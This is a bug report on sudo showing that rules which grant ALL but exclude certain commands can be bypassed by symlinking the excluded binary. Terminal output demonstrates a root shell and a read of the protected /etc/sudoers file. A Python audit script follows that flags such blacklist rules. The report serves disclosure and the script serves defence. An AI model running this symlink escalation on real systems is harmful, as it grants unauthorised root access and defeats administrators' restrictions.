Bugzilla – Bug 1009
Bypass Sudo Editing block on any blocked file
Last modified: 2021-11-21 23:05:38 MST
When you add a user to the sudoers file and attempt to block them from editing specific files, you can do this with the following:

username ALL=ALL, !/usr/bin/su

This will prevent the user from running the sudo su command to get a root shell. I have found that the following exploit will work:

1c44h1wy7i@pd-lpsrtlus498:~$ sudo su
Sorry, user 1c44h1wy7i is not allowed to execute '/usr/bin/su' as root on pd-lpsrtlus498.amberjack.launchpoint.
1c44h1wy7i@pd-lpsrtlus498:~$ ln -s /usr/bin/su su_exploit
1c44h1wy7i@pd-lpsrtlus498:~$ sudo ./su_exploit
root@pd-lpsrtlus498:/home/AMBERJACK/1c44h1wy7i# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@pd-lpsrtlus498:/home/AMBERJACK/1c44h1wy7i#

This works for any file that has been explicitly blacklisted, and can also be used to edit blacklisted files.

1c44h1wy7i@pd-lpsrtlus498:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
1c44h1wy7i@pd-lpsrtlus498:~$ sudo cat /etc/sudoers
Sorry, user 1c44h1wy7i is not allowed to execute '/usr/bin/cat /etc/sudoers' as root on pd-lpsrtlus498.amberjack.launchpoint.
1c44h1wy7i@pd-lpsrtlus498:~$ ln -s /etc/sudoers sudoers_exp
1c44h1wy7i@pd-lpsrtlus498:~$ sudo cat sudoers_exp
# testing
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#

This appears to work on any version of sudo 1.8.x (including the default sudo 1.8.31/32 available on Ubuntu 20). It is patched on sudo version 1.9.5p2 installed on my Fedora box (not sure what version patched it).
It isn't fixed in latest. I had a typo in my sudoers file. So it works on any version, including latest.
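The rule shape in this report (grant ALL, then subtract commands with "!") is the pattern the sudoers(5) manual itself warns is not a security control, since a permitted user can run the excluded program under a different name. As an added audit check that is not part of the bug report or of sudo, the script below parses a constructed sudoers snippet and flags such blacklist rules; the user names, the EDITORS alias and the deploy rule are invented sample data, and alias expansion and @include files are not handled.

```python
import re

# Constructed sample sudoers content. The "analyst" rule is the shape discussed in
# the report; "admin" and "deploy" are explicit allow-list rules for comparison.
SAMPLE_SUDOERS = """\
# constructed sample, not a real host's configuration
Defaults env_reset
Cmnd_Alias EDITORS = /usr/bin/vim, /usr/bin/nano
analyst ALL=(ALL) ALL, !/usr/bin/su
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
admin   ALL=(ALL) ALL
"""

# user host=(runas) [tags:] cmd, cmd, ...   (runas part optional)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
# Tag prefixes such as NOPASSWD: or NOEXEC: that may precede a command
TAG_RE = re.compile(
    r"^(?:(?:NO)?(?:PASSWD|EXEC|SETENV|LOG_INPUT|LOG_OUTPUT|MAIL|FOLLOW|INTERCEPT):\s*)+")

def parse_rules(text):
    """Yield (user, host, runas, [commands]) for each user specification line.
    Comments, Defaults and alias definitions are skipped; backslash-continued lines are joined."""
    text = text.replace("\\\n", " ")
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith(
                ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = [TAG_RE.sub("", c.strip()) for c in m.group("cmds").split(",")]
        yield m.group("user"), m.group("host"), m.group("runas"), cmds

def find_blacklist_rules(text):
    """Return (user, [negated commands]) for rules that grant ALL and then subtract
    commands with '!'. Such rules only restrict the literal path, not the program."""
    findings = []
    for user, host, runas, cmds in parse_rules(text):
        negated = [c for c in cmds if c.startswith("!")]
        if "ALL" in cmds and negated:
            findings.append((user, negated))
    return findings

if __name__ == "__main__":
    for user, negated in find_blacklist_rules(SAMPLE_SUDOERS):
        print(f"{user}: 'ALL' minus {negated} is not an effective restriction; "
              "replace it with an explicit allow-list of commands")
```

Feed it the output of `visudo -c`-validated files from /etc/sudoers and /etc/sudoers.d/ to find every rule that needs rewriting as an allow-list.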